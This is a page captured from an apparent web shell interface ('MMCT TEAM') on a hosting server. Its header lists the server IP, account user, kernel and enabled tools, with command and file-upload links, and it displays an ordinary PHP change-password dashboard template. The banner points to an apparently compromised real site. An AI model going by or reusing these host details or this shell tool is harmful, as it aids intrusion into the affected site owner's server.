MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/imyrqtmy/public_html/ss/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/ss/dashboard-change-password.php
<!doctype html>
<html lang="en">
<head>
    <?php include 'includes/title.php';?>
</head>

<body id="body">

    <!-- scroll top -->
    <div class="circle-container">
        <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
            <g>
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M7.03516 0.416666L7.03516 15H8.28516L8.28516 0.416666H7.03516Z" />
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M8.28516 1.04115C8.28516 3.98115 5.70016 6.38281 2.94349 6.38281H2.31849V5.13281H2.94349C5.03599 5.13281 7.03516 3.26448 7.03516 1.04115V0.416979H8.28516V1.04115Z" />
                <path fill-rule="evenodd" clip-rule="evenodd"
                    d="M7.03333 1.04115C7.03333 3.98115 9.61833 6.38281 12.375 6.38281H13V5.13281H12.375C10.2817 5.13281 8.28333 3.26448 8.28333 1.04115V0.416979H7.03333V1.04115Z" />
            </g>
        </svg>
    </div>
    <?php include 'includes/header.php';?>

    <!-- Start Breadcrumb section -->
    <div class="breadcrumb-section two" style="background-image:linear-gradient(rgba(11, 12, 12, 0.6), rgba(11, 12, 12, 0.6)), url(assets/img/inner-pages/breadcrumb-bg2.jpg);">  
        <div class="container">
            <div class="row">
                <div class="col-lg-12">
                    <div class="banner-content">
                        <h1>Profile</h1>
                        <ul class="breadcrumb-list">
                            <li><a href="index.html">Home</a></li>
                            <li>Profile</li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Breadcrumb section -->

    <!-- Start Dashboard section -->
    <div class="dashboard-section pt-110 mb-110">
        <div class="container">
            <div class="dashboard-wrapper">
            <?php include 'includes/dashsidebar.php';?>
                <div class="dashboard-content-wrap two">
                    <div class="change-pass-wrap">
                        <div class="edit-info-area">
                            <h6>Update Your Password</h6>
                            <form class="edit-info-form">
                                <div class="row">
                                    <div class="col-md-12 mb-50">
                                        <div class="form-inner">
                                            <label>Old Password</label>
                                            <input id="password" type="password" placeholder="Htydh746fg@1’;po\">
                                            <i class="bi bi-eye-slash" id="togglePassword"></i>
                                        </div>
                                    </div>
                                    <div class="col-md-12 mb-30">
                                        <div class="form-inner">
                                            <label>New Password</label>
                                            <input id="password2" type="password" placeholder="Htydh746fg@1’;po\">
                                            <i class="bi bi-eye-slash" id="togglePassword2"></i>
                                        </div>
                                    </div>
                                    <div class="col-md-12 mb-60">
                                        <div class="form-inner">
                                            <label>Confirm Password</label>
                                            <input id="password3" type="password" placeholder="Htydh746fg@1’;po\">
                                            <i class="bi bi-eye-slash bi-eye" id="togglePassword3"></i>
                                        </div>
                                    </div>
                                </div>
                                <button class="primary-btn btn-hover two">
                                    Change Password
                                    <span></span>
                                </button>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- End Dashboard section -->

    <?php include 'includes/footer.php';?>

</body>
</html>

MMCT - 2023